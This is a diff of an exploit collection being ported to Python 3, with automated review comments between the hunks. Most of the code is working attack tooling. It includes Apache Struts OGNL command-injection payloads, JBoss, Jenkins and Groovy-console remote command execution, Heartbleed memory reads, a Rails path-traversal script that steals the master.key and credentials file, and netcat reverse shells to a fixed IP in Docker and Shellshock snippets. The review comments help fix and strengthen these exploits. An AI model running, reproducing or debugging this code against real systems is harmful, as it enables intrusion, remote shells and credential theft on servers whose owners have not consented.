print BOLD+" * [UPLOAD SHELL]"+ENDC print(BOLD+" * [UPLOAD SHELL]"+ENDC)
print OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC)
while 1: while 1:
separador = raw_input(GREEN+"Struts2@Shell_3:$ "+ENDC) separador = input(GREEN+"Struts2@Shell_3:$ "+ENDC)
espacio = separador.split(' ') espacio = separador.split(' ')
comando = "%20".join(espacio) comando = "%20".join(espacio)
shell = urllib2.urlopen(host+exploit3(str(comando))) shell = urllib.request.urlopen(host+exploit3(str(comando)))
print "\n"+shell.read() print("\n"+shell.read())
else: else:
x = len(validador()) x = len(validador())
exit(0) exit(0)
else: else:
print BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x) print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
except: except:
pass pass
x=x+1 x=x+1
else: else:
print RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC print(RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC)
exit(0) exit(0)
else: else:
print RED+" Debe Ingresar una Url\n"+ENDC print(RED+" Debe Ingresar una Url\n"+ENDC)
exit(0) exit(0)
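Review bot: the Python 3 conversion breaks every response check, because `urllib.request.urlopen(...).read()` now returns `bytes`: `response.read().find("mamalo")` raises `TypeError` (a `bytes` object cannot be searched for a `str`) and aborts the script on the very first target, `print("\n"+shell.read())` fails the same way on `str + bytes`, and the `result.find("ASCII")` / `result.find("uid=")` chains in the CVE-2017-5638 and CVE-2018-11776 loops sit inside `try: ... except: pass`, so there the error is swallowed and every host is silently reported `NO VULNERABLE`. Decode the bodies once, e.g. `.read().decode("utf-8", "replace")`, before the `.find` calls and string concatenations; the `requests.get(...).text` call in the CVE-2018-11776 block is the only path that already yields `str`. Two pre-existing issues visible in both columns are worth fixing while here: `url = host.replace('#', '%23')` is immediately overwritten by `url = host.replace(' ', '%20')`, so the `#` escaping never takes effect (the second line should operate on `url`), and the bare `except: pass` blocks hide exactly the kind of failure described above.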


@@ -1,176 +0,0 @@
#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# struts-pwn: Apache Struts CVE-2017-5638 Exploit
# Author:
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
# This code is based on:
# https://www.exploit-db.com/exploits/41570/
# https://www.seebug.org/vuldb/ssvid-92746
# *****************************************************
import sys
import random
import requests
import argparse
# Disable SSL warnings
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except:
pass
if len(sys.argv) <= 1:
print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
print('[*] Struts-PWN - @mazen160')
print('\n%s -h for help.' % (sys.argv[0]))
exit(0)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
dest="url",
help="Check a single URL.",
action='store')
parser.add_argument("-l", "--list",
dest="usedlist",
help="Check a list of URLs.",
action='store')
parser.add_argument("-c", "--cmd",
dest="cmd",
help="Command to execute. (Default: id)",
action='store',
default='id')
parser.add_argument("--check",
dest="do_check",
help="Check if a target is vulnerable.",
action='store_true')
args = parser.parse_args()
url = args.url if args.url else None
usedlist = args.usedlist if args.usedlist else None
url = args.url if args.url else None
cmd = args.cmd if args.cmd else None
do_check = args.do_check if args.do_check else None
def url_prepare(url):
url = url.replace('#', '%23')
url = url.replace(' ', '%20')
if ('://' not in url):
url = str('http') + str('://') + str(url)
return(url)
def exploit(url, cmd):
url = url_prepare(url)
print('\n[*] URL: %s' % (url))
print('[*] CMD: %s' % (cmd))
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='%s')." % cmd
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
headers = {
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Content-Type': str(payload),
'Accept': '*/*'
}
timeout = 3
try:
output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
except Exception as e:
print("EXCEPTION::::--> " + str(e))
output = 'ERROR'
return(output)
def check(url):
url = url_prepare(url)
print('\n[*] URL: %s' % (url))
random_string = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for i in range(7))
payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']."
payload += "addHeader('%s','%s')}.multipart/form-data" % (random_string, random_string)
headers = {
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Content-Type': str(payload),
'Accept': '*/*'
}
timeout = 3
try:
resp = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
if ((random_string in resp.headers.keys()) and (resp.headers[random_string] == random_string)):
result = True
else:
result = False
except Exception as e:
print("EXCEPTION::::--> " + str(e))
result = False
return(result)
def main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check):
if url:
if do_check:
result = check(url) # Only check for existence of Vulnerablity
output = '[*] Status: '
if result is True:
output += 'Vulnerable!'
else:
output += 'Not Affected.'
else:
output = exploit(url, cmd) # Exploit
print(output)
if usedlist:
URLs_List = []
try:
f_file = open(str(usedlist), 'r')
URLs_List = f_file.read().replace('\r', '').split('\n')
try:
URLs_List.remove('')
except ValueError:
pass
f_file.close()
except:
print('Error: There was an error in reading list file.')
exit(1)
for url in URLs_List:
if do_check:
result = check(url) # Only check for existence of Vulnerablity
output = '[*] Status: '
if result is True:
output += 'Vulnerable!'
else:
output += 'Not Affected.'
else:
output = exploit(url, cmd) # Exploit
print(output)
print('[%] Done.')
if __name__ == '__main__':
try:
main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check)
except KeyboardInterrupt:
print('\nKeyboardInterrupt Detected.')
print('Exiting...')
exit(0)
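Review bot: deleting this file removes the only non-destructive vulnerability check for CVE-2017-5638 in the repository: its `check()` injects `addHeader('<random>','<random>')` through the `Content-Type` header and looks for that header in the response, which proves OGNL evaluation without running a command, whereas the combined script retained above detects by executing `cat /etc/passwd`, `dir`, `net users` and grepping the output. The `-l/--list` batch mode, the `verify=False` / `timeout=3` / `allow_redirects=False` request settings and the attribution to Mazin Ahmed in the header go with it. If the goal is de-duplication, port `check()` into the combined script before removing this one, or keep this file and drop the CVE-2017-5638 branch from the other.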

2
CVE Exploits/Apache Struts 2 CVE-2017-9805.py Executable file → Normal file

@@ -8,6 +8,8 @@
# https://github.com/rapid7/metasploit-framework/pull/8924 # https://github.com/rapid7/metasploit-framework/pull/8924
# https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/ # https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/
# ***************************************************** # *****************************************************
from __future__ import print_function
from builtins import str
import argparse import argparse
import requests import requests
import sys import sys
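Review bot: `from builtins import str` only does something on Python 2, where it requires the third-party `future` package (on Python 3 `builtins` is the standard module and the line is a no-op), so this hunk turns a script that ran on Python 2 into one that fails at import time unless `future` is installed, while changing nothing on Python 3; either drop the line or record the dependency. The file header also changes the mode from executable to normal file, so `./Apache Struts 2 CVE-2017-9805.py` stops working and the script must be invoked as `python3 ...`; if that is intentional it deserves a mention in the commit message.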

15
CVE Exploits/Apache Struts 2 CVE-2018-11776.py Executable file → Normal file

@@ -8,6 +8,11 @@
# https://github.com/jas502n/St2-057 # https://github.com/jas502n/St2-057
# ***************************************************** # *****************************************************
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import range
import argparse import argparse
import random import random
import requests import requests
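Review bot: same unlisted dependency as in the other converted scripts: `from future import standard_library` and `standard_library.install_aliases()` fail on Python 3 without the third-party `future` package, and `from builtins import str` / `from builtins import range` are no-ops there (and need `future` on Python 2). For a script that now targets Python 3 all four lines can simply be deleted, leaving only `from __future__ import print_function`.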
@@ -15,7 +20,7 @@ import sys
try: try:
from urllib import parse as urlparse from urllib import parse as urlparse
except ImportError: except ImportError:
import urlparse import urllib.parse
# Disable SSL warnings # Disable SSL warnings
try: try:
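Review bot: the fallback branch is now either unreachable or broken: on Python 3 `from urllib import parse as urlparse` succeeds, so the `except ImportError` body never runs, and on Python 2 the replacement `import urllib.parse` raises a second `ImportError` inside the handler, so the Python 2 fallback that `import urlparse` provided is gone while the try/except scaffolding remains. Replace the whole block with a plain `import urllib.parse`, or keep the `as urlparse` alias and use it consistently in `parse_url` below.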
@@ -77,13 +82,13 @@ def parse_url(url):
if ('://' not in url): if ('://' not in url):
url = str("http://") + str(url) url = str("http://") + str(url)
scheme = urlparse.urlparse(url).scheme scheme = urllib.parse.urlparse(url).scheme
# Site: http://example.com # Site: http://example.com
site = scheme + '://' + urlparse.urlparse(url).netloc site = scheme + '://' + urllib.parse.urlparse(url).netloc
# FilePath: /demo/struts2-showcase/index.action # FilePath: /demo/struts2-showcase/index.action
file_path = urlparse.urlparse(url).path file_path = urllib.parse.urlparse(url).path
if (file_path == ''): if (file_path == ''):
file_path = '/' file_path = '/'
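Review bot: `urllib.parse.urlparse(url)` on these three lines refers to a name `urllib` that this file never binds: the import that succeeds is `from urllib import parse as urlparse`, which binds `urlparse` only, so unless an `import urllib` exists elsewhere in the file the first call to `parse_url` raises `NameError` on Python 3. Either leave the three calls as `urlparse.urlparse(...)`, which matched the alias and was correct, or change the import to `import urllib.parse`.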
@@ -154,7 +159,7 @@ def check(url):
except Exception as e: except Exception as e:
print("EXCEPTION::::--> " + str(e)) print("EXCEPTION::::--> " + str(e))
continue continue
if "Location" in resp.headers.keys(): if "Location" in list(resp.headers.keys()):
if str(multiplication_value) in resp.headers['Location']: if str(multiplication_value) in resp.headers['Location']:
print("[*] Status: Vulnerable!") print("[*] Status: Vulnerable!")
return(injection_point) return(injection_point)
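Review bot: `"Location" in list(resp.headers.keys())` is a futurize artifact that makes the check worse, not better: `resp.headers` is a requests `CaseInsensitiveDict`, so `"Location" in resp.headers` already performs the membership test, does it case-insensitively (a server sending `location:` still matches) and avoids materialising a list; the `.keys()` form compares exact strings and would report such a server as not vulnerable. Revert to the original expression.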


@@ -1,3 +1,4 @@
from __future__ import print_function
import requests import requests
import logging import logging
import json import json
@@ -23,7 +24,7 @@ if r.json:
for container in r.json(): for container in r.json():
container_id = container['Id'] container_id = container['Id']
container_name = container['Names'][0].replace('/','') container_name = container['Names'][0].replace('/','')
print(container_id, container_name) print((container_id, container_name))
# Step 2 - Prepare command # Step 2 - Prepare command
cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]' cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]'
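Review bot: `print((container_id, container_name))` preserves the Python 2 quirk rather than the intended output: the original `print(container_id, container_name)` was a Python 2 print statement applied to a tuple, so it printed `('id', 'name')`, and now that `from __future__ import print_function` is imported in the hunk above, the plain two-argument form prints `id name`, which is what a reader of the container list wants. Drop the extra pair of parentheses.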

0
CVE Exploits/Drupalgeddon2 CVE-2018-7600.rb Executable file → Normal file

51
CVE Exploits/Heartbleed CVE-2014-0160.py Executable file → Normal file

@@ -4,6 +4,9 @@
# The author disclaims copyright to this source code. # The author disclaims copyright to this source code.
# Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin) # Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin)
from __future__ import print_function
from builtins import str
from builtins import range
import sys import sys
import struct import struct
import socket import socket
@@ -61,12 +64,12 @@ def hexdump(s, dumpf, quiet):
dump.write(s) dump.write(s)
dump.close() dump.close()
if quiet: return if quiet: return
for b in xrange(0, len(s), 16): for b in range(0, len(s), 16):
lin = [c for c in s[b : b + 16]] lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin) hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat) print(' %04x: %-48s %s' % (b, hxdat, pdat))
print print()
def recvall(s, length, timeout=5): def recvall(s, length, timeout=5):
endtime = time.time() + timeout endtime = time.time() + timeout
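Review bot: `hexdump` is still not Python 3 safe after this change. `s` comes from `socket.recv` as `bytes`, so every `c` produced by `lin = [c for c in s[b : b + 16]]` is an `int`, and `ord(c)` in both `hxdat` and `pdat` raises `TypeError: ord() expected string of length 1, but int found`. Use `c` directly (`'%02X' % c`, `32 <= c <= 126`, `chr(c)` for the printable column), or iterate over `bytearray(s)` so the same code works on Python 2 and 3.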
@@ -92,57 +95,57 @@ def recvall(s, length, timeout=5):
def recvmsg(s): def recvmsg(s):
hdr = recvall(s, 5) hdr = recvall(s, 5)
if hdr is None: if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection' print('Unexpected EOF receiving record header - server closed connection')
return None, None, None return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr) typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10) pay = recvall(s, ln, 10)
if pay is None: if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection' print('Unexpected EOF receiving record payload - server closed connection')
return None, None, None return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) print(' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
return typ, ver, pay return typ, ver, pay
def hit_hb(s, dumpf, host, quiet): def hit_hb(s, dumpf, host, quiet):
while True: while True:
typ, ver, pay = recvmsg(s) typ, ver, pay = recvmsg(s)
if typ is None: if typ is None:
print 'No heartbeat response received from '+host+', server likely not vulnerable' print('No heartbeat response received from '+host+', server likely not vulnerable')
return False return False
if typ == 24: if typ == 24:
if not quiet: print 'Received heartbeat response:' if not quiet: print('Received heartbeat response:')
hexdump(pay, dumpf, quiet) hexdump(pay, dumpf, quiet)
if len(pay) > 3: if len(pay) > 3:
print 'WARNING: server '+ host +' returned more data than it should - server is vulnerable!' print('WARNING: server '+ host +' returned more data than it should - server is vulnerable!')
else: else:
print 'Server '+host+' processed malformed heartbeat, but did not return any extra data.' print('Server '+host+' processed malformed heartbeat, but did not return any extra data.')
return True return True
if typ == 21: if typ == 21:
if not quiet: print 'Received alert:' if not quiet: print('Received alert:')
hexdump(pay, dumpf, quiet) hexdump(pay, dumpf, quiet)
print 'Server '+ host +' returned error, likely not vulnerable' print('Server '+ host +' returned error, likely not vulnerable')
return False return False
def connect(host, port, quiet): def connect(host, port, quiet):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if not quiet: print 'Connecting...' if not quiet: print('Connecting...')
sys.stdout.flush() sys.stdout.flush()
s.connect((host, port)) s.connect((host, port))
return s return s
def tls(s, quiet): def tls(s, quiet):
if not quiet: print 'Sending Client Hello...' if not quiet: print('Sending Client Hello...')
sys.stdout.flush() sys.stdout.flush()
s.send(hello) s.send(hello)
if not quiet: print 'Waiting for Server Hello...' if not quiet: print('Waiting for Server Hello...')
sys.stdout.flush() sys.stdout.flush()
def parseresp(s): def parseresp(s):
while True: while True:
typ, ver, pay = recvmsg(s) typ, ver, pay = recvmsg(s)
if typ == None: if typ == None:
print 'Server closed connection without sending Server Hello.' print('Server closed connection without sending Server Hello.')
return 0 return 0
# Look for server hello done message. # Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E: if typ == 22 and ord(pay[0]) == 0x0E:
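Review bot: same bytes/str mismatch in this hunk: `ord(pay[0])` in `parseresp` fails on Python 3 because indexing `bytes` already yields an int (`pay[0] == 0x0E` is portable), and `s.send(hello)` in `tls` raises `TypeError` on Python 3 if `hello` (defined outside this hunk) is still a `str`; it needs to be a `bytes` object. Minor: `if typ == None` in `parseresp` should be `if typ is None`, which is the form `recvmsg` and `hit_hb` already use.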
@@ -156,10 +159,10 @@ def check(host, port, dumpf, quiet, starttls):
s.ehlo() s.ehlo()
s.starttls() s.starttls()
except smtplib.SMTPException: except smtplib.SMTPException:
print 'STARTTLS not supported...' print('STARTTLS not supported...')
s.quit() s.quit()
return False return False
print 'STARTTLS supported...' print('STARTTLS supported...')
s.quit() s.quit()
s = connect(host, port, quiet) s = connect(host, port, quiet)
s.settimeout(1) s.settimeout(1)
@@ -170,7 +173,7 @@ def check(host, port, dumpf, quiet, starttls):
s.send('starttls\r\n') s.send('starttls\r\n')
re = s.recv(1024) re = s.recv(1024)
except socket.timeout: except socket.timeout:
print 'Timeout issues, going ahead anyway, but it is probably broken ...' print('Timeout issues, going ahead anyway, but it is probably broken ...')
tls(s,quiet) tls(s,quiet)
else: else:
s = connect(host, port, quiet) s = connect(host, port, quiet)
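Review bot: `s.send('starttls\r\n')` passes a `str` to a socket, which raises `TypeError: a bytes-like object is required` on Python 3; the literal needs to be `b'starttls\r\n'`. Also `re = s.recv(1024)` reuses `re` as a variable name; if the `re` module is imported anywhere in this file it is shadowed here, so a name such as `resp` is safer.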
@@ -179,13 +182,13 @@ def check(host, port, dumpf, quiet, starttls):
version = parseresp(s) version = parseresp(s)
if version == 0: if version == 0:
if not quiet: print "Got an error while parsing the response, bailing ..." if not quiet: print("Got an error while parsing the response, bailing ...")
return False return False
else: else:
version = version - 0x0300 version = version - 0x0300
if not quiet: print "Server TLS version was 1.%d\n" % version if not quiet: print("Server TLS version was 1.%d\n" % version)
if not quiet: print 'Sending heartbeat request...' if not quiet: print('Sending heartbeat request...')
sys.stdout.flush() sys.stdout.flush()
if (version == 1): if (version == 1):
s.send(hbv10) s.send(hbv10)
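Review bot: the label printed by `print("Server TLS version was 1.%d\n" % version)` is off by one if `version` is the raw record version minus 0x0300, as the subtraction two lines above suggests: TLS 1.0 is 0x0301, so it prints as "1.1", TLS 1.2 (0x0303) as "1.3". `1.%d" % (version - 1)` gives the right name while leaving the `if (version == 1): s.send(hbv10)` dispatch untouched. The parentheses around `version == 1` are unnecessary in Python.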
@@ -205,8 +208,8 @@ def main():
options.print_help() options.print_help()
return return
print 'Scanning ' + args[0] + ' on port ' + str(opts.port) print('Scanning ' + args[0] + ' on port ' + str(opts.port))
for i in xrange(0,opts.num): for i in range(0,opts.num):
check(args[0], opts.port, opts.file, opts.quiet, opts.starttls) check(args[0], opts.port, opts.file, opts.quiet, opts.starttls)
if __name__ == '__main__': if __name__ == '__main__':

@@ -3,6 +3,7 @@
# Jboss Java Deserialization RCE (CVE-2015-7501) # Jboss Java Deserialization RCE (CVE-2015-7501)
# Made with <3 by @byt3bl33d3r # Made with <3 by @byt3bl33d3r
from __future__ import print_function
import requests import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
@@ -36,26 +37,26 @@ else:
ysoserial_path = args.ysoserial_path ysoserial_path = args.ysoserial_path
if ysoserial_path is None: if ysoserial_path is None:
print '[-] Could not find ysoserial JAR file' print('[-] Could not find ysoserial JAR file')
sys.exit(1) sys.exit(1)
if len(args.target.split(":")) != 2: if len(args.target.split(":")) != 2:
print '[-] Target must be in format IP:PORT' print('[-] Target must be in format IP:PORT')
sys.exit(1) sys.exit(1)
if not args.command: if not args.command:
print '[-] You must specify a command to run' print('[-] You must specify a command to run')
sys.exit(1) sys.exit(1)
ip, port = args.target.split(':') ip, port = args.target.split(':')
print '[*] Target IP: {}'.format(ip) print('[*] Target IP: {}'.format(ip))
print '[*] Target PORT: {}'.format(port) print('[*] Target PORT: {}'.format(port))
gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command]) gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget) r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
if r.status_code == 200: if r.status_code == 200:
print '[+] Command executed successfully' print('[+] Command executed successfully')
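Review bot: `gadget = check_output(['java', '-jar', ysoserial_path, ...])` raises `subprocess.CalledProcessError` when ysoserial exits non-zero and `OSError` when `java` is not on PATH, and neither is caught, so a missing JRE produces a traceback instead of the `[-]` style message the three checks above it use; wrap the call in a try/except that prints one. The `r.status_code == 200` branch also prints "Command executed successfully" for any 200 response, which overstates what the script actually observed; "request accepted" is the accurate wording.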

File diff suppressed because one or more lines are too long

@@ -4,6 +4,7 @@
#Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins #Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins
#Made with <3 by @byt3bl33d3r #Made with <3 by @byt3bl33d3r
from __future__ import print_function
import requests import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
@@ -23,17 +24,17 @@ if len(sys.argv) < 2:
args = parser.parse_args() args = parser.parse_args()
if len(args.target.split(':')) != 2: if len(args.target.split(':')) != 2:
print '[-] Target must be in format IP:PORT' print('[-] Target must be in format IP:PORT')
sys.exit(1) sys.exit(1)
if not args.command: if not args.command:
print '[-] You must specify a command to run' print('[-] You must specify a command to run')
sys.exit(1) sys.exit(1)
ip, port = args.target.split(':') ip, port = args.target.split(':')
print '[*] Target IP: {}'.format(ip) print('[*] Target IP: {}'.format(ip))
print '[*] Target PORT: {}'.format(port) print('[*] Target PORT: {}'.format(port))
xml_formatted = '' xml_formatted = ''
command_list = args.command.split() command_list = args.command.split()
@@ -67,11 +68,11 @@ xml_payload = '''<map>
</entry> </entry>
</map>'''.format(xml_formatted.strip()) </map>'''.format(xml_formatted.strip())
print '[*] Generated XML payload:' print('[*] Generated XML payload:')
print xml_payload print(xml_payload)
print print()
print '[*] Sending payload' print('[*] Sending payload')
headers = {'Content-Type': 'text/xml'} headers = {'Content-Type': 'text/xml'}
r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload) r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload)
@@ -79,5 +80,5 @@ paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml']
if r.status_code == 500: if r.status_code == 500:
for path in paths_in_trace: for path in paths_in_trace:
if path in r.text: if path in r.text:
print '[+] Command executed successfully' print('[+] Command executed successfully')
break break

@@ -0,0 +1,32 @@
#!/usr/bin/env python
# SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py
# DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b
from __future__ import print_function
from builtins import input
import requests
import sys
print("""
Jenkins Groovy Console cmd runner.
usage: ./jgc.py [HOST]
Then type any command and wait for STDOUT output from remote machine.
Type 'exit' to exit :)
""")
URL = sys.argv[1] + '/scriptText'
HEADERS = {
'User-Agent': 'jgc'
}
while 1:
CMD = input(">> Enter command to execute (or type 'exit' to exit): ")
if CMD == 'exit':
print("exiting...\n")
exit(0)
DATA = {
'script': 'println "{}".execute().text'.format(CMD)
}
result = requests.post(URL, headers=HEADERS, data=DATA)
print(result.text)
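Review bot: `URL = sys.argv[1] + '/scriptText'` has no argument check, so running the script without a host prints the usage banner and then dies with `IndexError` instead of a clean exit; test `len(sys.argv)` first. `exit(0)` is the site-module helper, `sys.exit(0)` is the portable call and `sys` is already imported; `while 1` reads better as `while True`; and `requests.post` has no `timeout`, so an unresponsive host hangs the loop indefinitely. Documentation: the usage line should say that HOST must include the scheme (`http://...`), because the value is concatenated straight into the URL and `requests` rejects a URL without one.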

@@ -1,16 +1,29 @@
# Common Vulnerabilities and Exposures # Common Vulnerabilities and Exposures
Big CVEs in the last 5 years. Big CVEs in the last 5 years.
## CVE-2014-0160 - Heartbleed ## CVE-2014-0160 - Heartbleed
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs). The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
## CVE-2014-6271 - Shellshock ## CVE-2014-6271 - Shellshock
Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system. Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
```bash
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n
```
## CVE-2017-5638 - Apache Struts 2 ## CVE-2017-5638 - Apache Struts 2
On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header. On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.
## CVE-2018-7600 - Drupalgeddon 2
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
## Thanks to ## Thanks to
* http://heartbleed.com
* https://en.wikipedia.org/wiki/Shellshock_(software_bug) * [Heartbleed - Official website](http://heartbleed.com)
* [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug))
* [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/) * [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)
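Review bot: the new Shellshock snippet inside the ```bash fence is an unterminated line: the double quote opened after `echo -e` is never closed, so as written it is a shell syntax error rather than a copy-pasteable command, and the `192.168.0.XX` value should be labelled as a placeholder. Documentation: the new CVE-2018-7600 section has no entry in the "Thanks to" list while the other three CVEs do; add its reference. Minor wording in the retained text: "a family of security bug" should be "bugs". Replacing the bare `* http://heartbleed.com` entry with a titled link is consistent with the other entries, good.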

@@ -0,0 +1,156 @@
require 'erb'
require "./demo-5.2.1/config/environment"
require "base64"
require 'net/http'
$proxy_addr = '127.0.0.1'
$proxy_port = 8080
$remote = "http://172.18.0.3:3000"
$ressource = "/demo"
puts "\nRails exploit CVE-2019-5418 + CVE-2019-5420 = RCE\n\n"
print "[+] Checking if vulnerable to CVE-2019-5418 => "
uri = URI($remote + $ressource)
req = Net::HTTP::Get.new(uri)
req['Accept'] = "../../../../../../../../../../etc/passwd{{"
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
http.request(req)
}
if res.body.include? "root:x:0:0:root:"
puts "\033[92mOK\033[0m"
else
puts "KO"
abort
end
print "[+] Getting file => credentials.yml.enc => "
path = "../../../../../../../../../../config/credentials.yml.enc{{"
for $i in 0..9
uri = URI($remote + $ressource)
req = Net::HTTP::Get.new(uri)
req['Accept'] = path[3..57]
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
http.request(req)
}
if res.code == "200"
puts "\033[92mOK\033[0m"
File.open("credentials.yml.enc", 'w') { |file| file.write(res.body) }
break
end
path = path[3..57]
$i +=1;
end
print "[+] Getting file => master.key => "
path = "../../../../../../../../../../config/master.key{{"
for $i in 0..9
uri = URI($remote + $ressource)
req = Net::HTTP::Get.new(uri)
req['Accept'] = path[3..57]
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
http.request(req)
}
if res.code == "200"
puts "\033[92mOK\033[0m"
File.open("master.key", 'w') { |file| file.write(res.body) }
break
end
path = path[3..57]
$i +=1;
end
print "[+] Decrypt secret_key_base => "
credentials_config_path = File.join("../", "credentials.yml.enc")
credentials_key_path = File.join("../", "master.key")
ENV["RAILS_MASTER_KEY"] = res.body
